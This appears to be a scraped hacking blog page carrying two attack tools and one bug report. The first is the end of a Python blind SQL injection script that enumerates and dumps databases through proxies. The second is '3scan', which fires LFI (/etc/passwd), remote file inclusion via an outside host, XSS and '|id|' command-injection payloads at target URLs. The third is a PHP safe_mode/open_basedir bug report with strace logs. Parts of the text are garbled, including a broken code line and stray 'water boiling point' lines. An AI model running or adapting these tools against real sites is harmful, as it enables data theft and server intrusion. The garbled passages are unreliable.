                        sys.exit(1)
                ser_ver+=1
                gets+=1
        except (KeyboardInterrupt, SystemExit):
            raise
    except:
                pass
       
#Build URLS
if mode == "--schema":
    if arg_database != "None" and arg_table == "None":
                print "[+] Showing Tables from database \""+arg_database+"\""
                file.write("\n[+] Showing Tables from database \""+arg_database+"\"")
                count_URL = site+"+and+((SELECT+COUNT(table_name)"
                count_URL += "+FROM+information_schema.TABLES+WHERE+table_schema+=+0x"+arg_database.encode("hex")+"))"
                line_URL = site+"+and+ascii(substring((SELECT+table_name"
                line_URL += "+FROM+information_schema.TABLES+WHERE+table_schema+=+0x"+arg_database.encode("hex")
        if arg_database != "None" and arg_table != "None":
                print "[+] Showing Columns from database \""+arg_database+"\" and Table \""+arg_table+"\""
                file.write("\n[+] Showing Columns from database \""+arg_database+"\" and Table \""+arg_table+"\"")
                count_URL = site+"+and+((SELECT+COUNT(column_name)"
                count_URL += "+FROM+information_schema.COLUMNS+WHERE+table_schema+=+0x"+arg_database.encode("hex")
                count_URL += "+AND+table_name+=+0x"+arg_table.encode("hex")+"))"
                line_URL = site+"+and+ascii(substring((SELECT+column_name"
                line_URL += "+FROM+information_schema.COLUMNS+WHERE+table_schema+=+0x"+arg_database.encode("hex")
                line_URL += "+AND+table_name+=+0x"+arg_table.encode("hex")
elif mode == "--dump":               
    print "[+] Dumping data from database \""+str(arg_database)+"\" Table \""+str(arg_table)+"\""
    print "[+] and Column(s) "+str(arg_columns)
    file.write("\n[+] Dumping data from database \""+str(arg_database)+"\" Table \""+str(arg_table)+"\"")
        file.write("\n[+] Column(s) "+str(arg_columns))
        for column in arg_columns:
                darkc0de += column+",0x3a,"
        darkc0de = darkc0de.rstrip("0x3a,")
        count_URL = site+"+and+((SELECT+COUNT(*)+FROM+"
        count_URL = count_URL+""+arg_database+"."+arg_table+"))"       
        line_URL = site+"+and+ascii(substring((SELECT+concat("+darkc0de+")+FROM+"
        line_URL = line_URL+""+arg_database+"."+arg_table
        if ser_ver == 4:
                count_URL = site+"+and+((SELECT+COUNT(*)+FROM+"+arg_table+"))"
                line_URL = site+"+and+ascii(substring((SELECT+concat("+darkc0de+")+FROM+"+arg_table
                if arg_database == "mysql" or arg_database == "MYSQL" or arg_database == "MySQL":
                        count_URL = site+"+and+((SELECT+COUNT(*)+FROM+mysql."+arg_table+"))"
                        line_URL = site+"+and+ascii(substring((SELECT+concat("+darkc0de+")+FROM+mysql."+arg_table
elif mode == "--dbs":
    print "[+] Showing all databases current user has access too!"
    file.write("\n[+] Showing all databases current user has access too!")
        count_URL = site+"+and+((SELECT+COUNT(schema_name)"
        count_URL += "+FROM+information_schema.schemata+where+schema_name+!=+0x"+"information_schema".encode("hex")+"))"
    line_URL = site+"+and+ascii(substring((SELECT+schema_name"
    line_URL += "+from+information_schema.schemata+where+schema_name+!=+0x"+"information_schema".encode("hex")
line_URL += "+LIMIT+"

if mode == "--info":
        print "[+] Showing database version, username@location, and database name!"
    file.write("\n[+] Showing database version, username@location, and database name!")
    count_URL = "Nothing"
    line_URL = site+"+and+ascii(substring((SELECT+concat(version(),0x3a,user(),0x3a,database())),"


#Lets Fuzz
if mode == "--fuzz":
        print "\n[%s] StartTime" % time.strftime("%X")
        file.write("\n\n[%s] StartTime" % time.strftime("%X"))
        print "[+] Fuzzing Tables..."
        file.write("\n[+] Fuzzing Tables...")
        fuzz_TABLE_url = site+"+and+(SELECT+1+from+TABLE+limit+0,1)=1"
        for table in fuzz_tables:
                try:
                        proxy_num+=1
                        gets+=1
                        table_URL = fuzz_TABLE_url.replace("TABLE",table)
                        source = proxy_list[proxy_num % proxy_len].open(table_URL).read()
                        match = re.findall(string,source)
                        if len(match) >= 1:
                                print "\n[Table]:",table
                                file.write("\n\n[Table]:"+table)
                                fuzz_COLUMN_url = site+"+and+(SELECT+substring(concat(1,COLUMN),1,1)+from+"+table+"+limit+0,1)=1"
                                for column in fuzz_columns:
                                        try:
                                                proxy_num+=1
                                                gets+=1
                                                column_URL = fuzz_COLUMN_url.replace("COLUMN",column)
                                                source = proxy_list[proxy_num % proxy_len].open(column_URL).read()
                                                match = re.findall(string,source)
                                                if len(match) >= 1:
                                                        print "[Column]:",column
                                                        file.write("\n[Column]:"+column)   
                                        except (KeyboardInterrupt, SystemExit):
                                                raise
                                        except:
                                                pass   
                except (KeyboardInterrupt, SystemExit):
                        raise
                except:
                        pass
        print "\n[%s] EndTime" % time.strftime("%X")
        print "[-] Total URL Requests",gets
        file.write("\n\n[%s] EndTime" % time.strftime("%X"))
        file.write("\n[-] Total URL Requests "+str(gets))
        print "[-] Done\n"
        file.write("\n[-] Done\n")
        print "Don't forget to check", dbt,"\n"
        file.close()
        sys.exit(1)

#lets count how many rows before we begin
print "[+] %s" % time.strftime("%X")
file.write("\n[+] %s" % time.strftime("%X"))
if mode != "--info":
        row_value = GuessValue(count_URL)
        print "[+] Number of Rows: ",row_value,"\n"
        file.write("\n[+] Number of Rows: "+str(row_value)+"\n")
else:
        row_value = 1
#print line_URL
#print Count_URL
       
#Primary Loop
lower_bound = 0
upper_bound = 127
for data_row in range(int(lim_num), row_value):
        sys.stdout.write("[%s]: " % (lim_num))
        file.write("\n[%s]: " % (lim_num))
        sys.stdout.flush()
        value = chr(upper_bound)
        while value != chr(0):
                try:
                        if mode != "--info":
                                Guess_URL = line_URL + str(lim_num) +",1),"+str(let_pos)+",1))"
                                #print Guess_URL
                                value = chr(GuessValue(Guess_URL))
                                sys.stdout.write("%s" % (value))
                                file.write(value)
                                sys.stdout.flush()
                                let_pos+=1
                        else:
                                Guess_URL = line_URL + str(let_pos)+",1))"
                                #print Guess_URL
                                value = chr(GuessValue(Guess_URL))
                                sys.stdout.write("%s" % (value))
                                file.write(value)
                                sys.stdout.flush()
                                let_pos+=1
                except (KeyboardInterrupt, SystemExit):
                        raise
                except:
                        pass
        print
        lim_num = int(lim_num) + 1
        let_pos = 1
        data_row+=1

#Lets wrap it up!
print "\n[-] %s" % time.strftime("%X")
print "[-] Total URL Requests",gets
file.write("\n\n[-] %s" % time.strftime("%X"))
file.write("\n[-] Total URL Requests "+str(gets))
print "[-] Done\n"
file.write("\n[-] Done\n")
print "Don't forget to check", dbt,"\n"
file.close()
Posted by at No comments:
Labels: ,

3scan ( lfi-xss-rfi-cmd) 

[code]

#!/usr/bin/python

#Checks LFI,XSS,RFI,CMD injection searches source and http response (simple)


#http://www.darkc0de.com

#d3hydr8[at]gmail[dot]com


import sys, httplib, urllib2, re


#Don't change LFI,XSS, or CMD

LFI = "../../../../../../../../../../../../etc/passwd"

RFI = "http://yozurino.com/r.txt?"

RFI_TITLE = "Target"

XSS = "%22%3Cscript%3Ealert%28%27XSS%27%29%3C%2Fscript%3E"

CMD = "|id|"


def main(host):

   host = host.replace("http://","")

   if host[-1:] != "=":

      print "\n[-] Host should end with a \'=\'\n"

      print "[-]",host

      sys.exit(1)


   print "\n[+] Host:",host


   try:

      print "\n[+] Checking XSS"

      xss(host)

      print "\n[+] Checking LFI"

      lfi(host)

      print "\n[+] Checking RFI"

      rfi(host)

      print "\n[+] Checking CMD"

      cmd(host)

   except(urllib2.HTTPError, urllib2.URLError), msg:

      print "[-] Error Occurred:",msg

      pass



def rfi(host):


   try:

      h = httplib.HTTP(host.rsplit("/")[0])

      h.putrequest("GET","/"+host.rsplit("/")[1]+RFI)

      h.putheader("Host", host.rsplit("/")[0])

      h.endheaders()

      status, reason, headers = h.getreply()

      source = urllib2.urlopen("http://"+host+RFI).read()

      if re.search("Target", source) and status == 200:

         print "[+] RFI:",host+RFI,"\n[+]",status, reason

      else:

         print "[-] Not Vuln."

   except(),msg:

      #print "[-] Error Occurred",msg

      pass


def xss(host):

   source = urllib2.urlopen("http://"+host+XSS).read()

   if re.search("XSS", source) != None:

      print "[!] XSS:",host+XSS

   else:

      print "[-] Not Vuln."


def cmd(host):

   source = urllib2.urlopen("http://"+host+CMD).read()

   if re.search("uid=", source) != None:

      print "[!] CMD:",host+CMD

   else:

      print "[-] Not Vuln."


def lfi(host):


   source = urllib2.urlopen("http://"+host+LFI).read()

   if re.search("root:", source) != None:

      print "[!] LFI:",host+LFI

   else:

      print "[-] Not Vuln."

   source = urllib2.urlopen("http://"+host+LFI+"").read()

   if re.search("root:", source) != None:

      print "[!] LFI:",host+LFI+""

   else:

      print "[-] Not Vuln. w/  Null Byte"


if len(sys.argv) != 3:

   print "\nUsage: ./3scan.py "

   print "ex: ./3scan.py -s www.example.com/index.php?page="

   print "ex: ./3scan.py -list /home/d3hydr8/sites.txt"

   print "\t[options]"

   print "\t   -s/-site  : Searches just that site"

   print "\t   -l/-list  : Searches list"

   sys.exit(1)


print "\n   d3hydr8[at]gmail[dot]com 3scan v1.0"

print "---------------------------------------"


if sys.argv[1].lower() == "-l" or sys.argv[1].lower() == "-list"{ :

}

   try:

        sites = open(sys.argv[2], "r").readlines()

   except(IOError):

        print "Error: Check your file path\n"

        sys.exit(1)

   for host in sites:

      main(host.replace("\n",""))

else:

   main(sys.argv[2])


print "\n[+] Done\n"

[/code]
Posted by at No comments:
Labels: , , , , ,

PHP 5.2.12 safe mode and open basedir bypass

about this vuln

Description:
------------
PHP lstat full pathname many times (at least 4) before read the file is looking for.
This behavior appear when in apache httpd configuration is specified PHP_ADMIN_VALUE open_basedir or safe_mode is On.

Test script:
---------------
To reproduce the problem please create a page phpinfo.php: "".

I have httpd.2.2.15, PHP 5.2.13.

[root@svilpar4 ~]# /usr/local/apache2/bin/httpd -V
Server version: Apache/2.2.15 (Unix)
Server built: Jul 9 2010 17:30:06
Server's Module Magic Number: 20051115:24
Server loaded: APR 1.2.7, APR-Util 1.2.7
Compiled using: APR 1.2.7, APR-Util 1.2.7
Architecture: 64-bit
Server MPM: Prefork
threaded: no
forked: yes (variable process count)
Server compiled with....
-D APACHE_MPM_DIR="server/mpm/prefork"
-D APR_HAS_SENDFILE
-D APR_HAS_MMAP
-D APR_HAVE_IPV6 (IPv4-mapped addresses enabled)
-D APR_USE_SYSVSEM_SERIALIZE
-D APR_USE_PTHREAD_SERIALIZE
-D SINGLE_LISTEN_UNSERIALIZED_ACCEPT
-D APR_HAS_OTHER_CHILD
-D AP_HAVE_RELIABLE_PIPED_LOGS
-D DYNAMIC_MODULE_LIMIT=128
-D HTTPD_ROOT="/usr/local/apache2"
-D SUEXEC_BIN="/usr/local/apache2/bin/suexec"
-D DEFAULT_PIDLOG="logs/httpd.pid"
-D DEFAULT_SCOREBOARD="logs/apache_runtime_status"
-D DEFAULT_LOCKFILE="logs/accept.lock"
-D DEFAULT_ERRORLOG="logs/error_log"
-D AP_TYPES_CONFIG_FILE="conf/mime.types"
-D SERVER_CONFIG_FILE="conf/httpd.conf"

[root@svilpar4 ~]# /usr/local/php5.2.13/bin/php -v
PHP 5.2.13 (cli) (built: Jul 1 2010 16:02:03)
Copyright (c) 1997-2010 The PHP Group
Zend Engine v2.2.0, Copyright (c) 1998-2010 Zend Technologies

Now we specify PHP_ADMIN_VALUE open_basedir in Virtual host configuration:

                PHP_ADMIN_VALUE open_basedir "/usr/local/myspace/webspace"


        ServerName damorealt.xoom.it
        DocumentRoot "/usr/local/myspace/webspace/httpdocs"
    CustomLog   /var/log/httpd/damorealt/access_log   combined
    ErrorLog   /var/log/httpd/damorealt/error_log


Stop & start apache httpd, "strace -f" all httpd instances and then call page http://damorealt.xoom.it/phpinfo.php, so we can reproduce behavior
Expected result:
----------------
If PHP_ADMIN_VALUE open_basedir "/usr/local/myspace/webspace" is removed and safe_mode is Off :

226235 accept(3, {sa_family=AF_INET, sin_port=htons(59366), sin_addr=inet_addr("212.48.14.186")}, [17179869200]) = 15
26235 getsockname(15, {sa_family=AF_INET, sin_port=htons(80), sin_addr=inet_addr("151.99.197.198")}, [17179869200]) = 0
26235 fcntl(15, F_GETFL)                = 0x2 (flags O_RDWR)
26235 fcntl(15, F_SETFL, O_RDWR|O_NONBLOCK) = 0
26235 read(15, "GET /phpinfo.php HTTP/1.0\r\nUser-"..., 8000) = 129
26235 gettimeofday({1278696735, 988799}, NULL) = 0
26235 stat("/usr/local/myspace/webspace/httpdocs/phpinfo.php", {st_mode=S_IFREG|0644, st_size=16, ...}) = 0
26235 open("/usr/local/myspace/.htaccess", O_RDONLY) = -1 ENOENT (No such file or directory)
26235 open("/usr/local/myspace/webspace/.htaccess", O_RDONLY) = -1 ENOENT (No such file or directory)
26235 open("/usr/local/myspace/webspace/httpdocs/.htaccess", O_RDONLY) = -1 ENOENT (No such file or directory)
26235 open("/usr/local/myspace/webspace/httpdocs/phpinfo.php/.htaccess", O_RDONLY) = -1 ENOTDIR (Not a directory)
26235 setitimer(ITIMER_PROF, {it_interval={0, 0}, it_value={20, 0}}, NULL) = 0
26235 rt_sigaction(SIGPROF, {0x2afef587dd80, [PROF], SA_RESTORER|SA_RESTART, 0x3916e302d0}, {SIG_DFL, [], 0}, 8) = 0
26235 rt_sigprocmask(SIG_UNBLOCK, [PROF], NULL, 8) = 0
26235 getcwd("/"..., 4095)              = 2
26235 chdir("/usr/local/myspace/webspace/httpdocs") = 0

water boiling point
26235 time(NULL)                        = 1278696735
26235 lstat("/usr", {st_mode=S_IFDIR|0755, st_size=4096, ...}) = 0
26235 lstat("/usr/local", {st_mode=S_IFDIR|0755, st_size=4096, ...}) = 0
26235 lstat("/usr/local/myspace", {st_mode=S_IFDIR|0755, st_size=4096, ...}) = 0
26235 lstat("/usr/local/myspace/webspace", {st_mode=S_IFDIR|0755, st_size=4096, ...}) = 0
26235 lstat("/usr/local/myspace/webspace/httpdocs", {st_mode=S_IFDIR|0755, st_size=4096, ...}) = 0
26235 lstat("/usr/local/myspace/webspace/httpdocs/phpinfo.php", {st_mode=S_IFREG|0644, st_size=16, ...}) = 0

And read the file.
26235 open("/usr/local/myspace/webspace/httpdocs/phpinfo.php", O_RDONLY) = 16
26235 fstat(16, {st_mode=S_IFREG|0644, st_size=16, ...}) = 0
26235 read(16, "\n", 8192) = 16
26235 read(16, "", 8192)                = 0
26235 read(16, "", 8192)                = 0
26235 close(16)                         = 0
26235 uname({sys="Linux", node="svilpar4", ...}) = 0
26235 time(NULL)                        = 1278696735
26235 writev(15, [{"HTTP/1.1 200 OK\r\nDate: Fri, 09 J"..., 173}, {"
\n

\n


highlight.bg"..., 4099}], 2) = 8204

26235 time(NULL)                        = 1278696735

26235 writev(15, [{" 
HT"..., 4108}, {"1024
\nenabled Keep-Alive<"..., 4206}], 1) = 4206
26235 write(10, "212.48.14.186 - - [09/Jul/2010:1"..., 116) = 116
26235 shutdown(15, 1 /* send */)        = 0
26235 poll([{fd=15, events=POLLIN}], 1, 2000) = 1 ([{fd=15, revents=POLLIN|POLLHUP}])
26235 read(15, "", 512)                 = 0
26235 close(15)                         = 0
26235 read(4, 0x7fff615ff5eb, 1)        = -1 EAGAIN (Resource temporarily unavailable)
26235 accept(3,





Actual result:
--------------
If PHP_ADMIN_VALUE open_basedir "/usr/local/myspace/webspace" is set and safe_mode is On :

25933 accept(3, {sa_family=AF_INET, sin_port=htons(47433), sin_addr=inet_addr("212.48.14.186")}, [17179869200]) = 15
25933 getsockname(15, {sa_family=AF_INET, sin_port=htons(80), sin_addr=inet_addr("151.99.197.198")}, [17179869200]) = 0
25933 fcntl(15, F_GETFL)                = 0x2 (flags O_RDWR)
25933 fcntl(15, F_SETFL, O_RDWR|O_NONBLOCK) = 0
25933 read(15, "GET /phpinfo.php HTTP/1.0\r\nUser-"..., 8000) = 129
25933 gettimeofday({1278695388, 52976}, NULL) = 0
25933 stat("/usr/local/myspace/webspace/httpdocs/phpinfo.php", {st_mode=S_IFREG|0644, st_size=16, ...}) = 0
25933 open("/usr/local/myspace/.htaccess", O_RDONLY) = -1 ENOENT (No such file or directory)
25933 open("/usr/local/myspace/webspace/.htaccess", O_RDONLY) = -1 ENOENT (No such file or directory)
25933 open("/usr/local/myspace/webspace/httpdocs/.htaccess", O_RDONLY) = -1 ENOENT (No such file or directory)
25933 open("/usr/local/myspace/webspace/httpdocs/phpinfo.php/.htaccess", O_RDONLY) = -1 ENOTDIR (Not a directory)
25933 setitimer(ITIMER_PROF, {it_interval={0, 0}, it_value={20, 0}}, NULL) = 0
25933 rt_sigaction(SIGPROF, {0x2b80442fdd80, [PROF], SA_RESTORER|SA_RESTART, 0x3916e302d0}, {SIG_DFL, [], 0}, 8) = 0
25933 rt_sigprocmask(SIG_UNBLOCK, [PROF], NULL, 8) = 0
25933 getcwd("/"..., 4095)              = 2
25933 chdir("/usr/local/myspace/webspace/httpdocs") = 0

water boiling point
25933 lstat("/usr", {st_mode=S_IFDIR|0755, st_size=4096, ...}) = 0
25933 lstat("/usr/local", {st_mode=S_IFDIR|0755, st_size=4096, ...}) = 0
25933 lstat("/usr/local/myspace", {st_mode=S_IFDIR|0755, st_size=4096, ...}) = 0
25933 lstat("/usr/local/myspace/webspace", {st_mode=S_IFDIR|0755, st_size=4096, ...}) = 0
25933 lstat("/usr/local/myspace/webspace/httpdocs", {st_mode=S_IFDIR|0755, st_size=4096, ...}) = 0
25933 lstat("/usr/local/myspace/webspace/httpdocs/phpinfo.php", {st_mode=S_IFREG|0644, st_size=16, ...}) = 0

First check
25933 lstat("/usr", {st_mode=S_IFDIR|0755, st_size=4096, ...}) = 0
25933 lstat("/usr/local", {st_mode=S_IFDIR|0755, st_size=4096, ...}) = 0
25933 lstat("/usr/local/myspace", {st_mode=S_IFDIR|0755, st_size=4096, ...}) = 0
25933 lstat("/usr/local/myspace/webspace", {st_mode=S_IFDIR|0755, st_size=4096, ...}) = 0
25933 lstat("/usr/local/myspace/webspace/httpdocs", {st_mode=S_IFDIR|0755, st_size=4096, ...}) = 0
25933 lstat("/usr/local/myspace/webspace/httpdocs/phpinfo.php", {st_mode=S_IFREG|0644, st_size=16, ...}) = 0

Second check
25933 lstat("/usr", {st_mode=S_IFDIR|0755, st_size=4096, ...}) = 0
25933 lstat("/usr/local", {st_mode=S_IFDIR|0755, st_size=4096, ...}) = 0
25933 lstat("/usr/local/myspace", {st_mode=S_IFDIR|0755, st_size=4096, ...}) = 0
25933 lstat("/usr/local/myspace/webspace", {st_mode=S_IFDIR|0755, st_size=4096, ...}) = 0

Third check (incomplete)
25933 lstat("/usr", {st_mode=S_IFDIR|0755, st_size=4096, ...}) = 0
25933 lstat("/usr/local", {st_mode=S_IFDIR|0755, st_size=4096, ...}) = 0
25933 lstat("/usr/local/myspace", {st_mode=S_IFDIR|0755, st_size=4096, ...}) = 0
25933 lstat("/usr/local/myspace/webspace", {st_mode=S_IFDIR|0755, st_size=4096, ...}) = 0
25933 lstat("/usr/local/myspace/webspace/httpdocs", {st_mode=S_IFDIR|0755, st_size=4096, ...}) = 0
25933 lstat("/usr/local/myspace/webspace/httpdocs/phpinfo.php", {st_mode=S_IFREG|0644, st_size=16, ...}) = 0

Final check and then read the file.
25933 open("/usr/local/myspace/webspace/httpdocs/phpinfo.php", O_RDONLY) = 16
25933 fstat(16, {st_mode=S_IFREG|0644, st_size=16, ...}) = 0
25933 read(16, "\n", 8192) = 16
25933 read(16, "", 8192)                = 0
25933 read(16, "", 8192)                = 0
25933 close(16)                         = 0


ref : http://bugs.php.net/bug.php?id=52312

http://securityreason.com/exploitalert/7571?utm_source=feedburner&utm_medium=feed&utm_campaign=Feed%3A+exploit_database+%28ExploitAlert+Database+-+Exploit+Database%29
Posted by at No comments:
Labels: , , , ,
Subscribe to: Comments (Atom)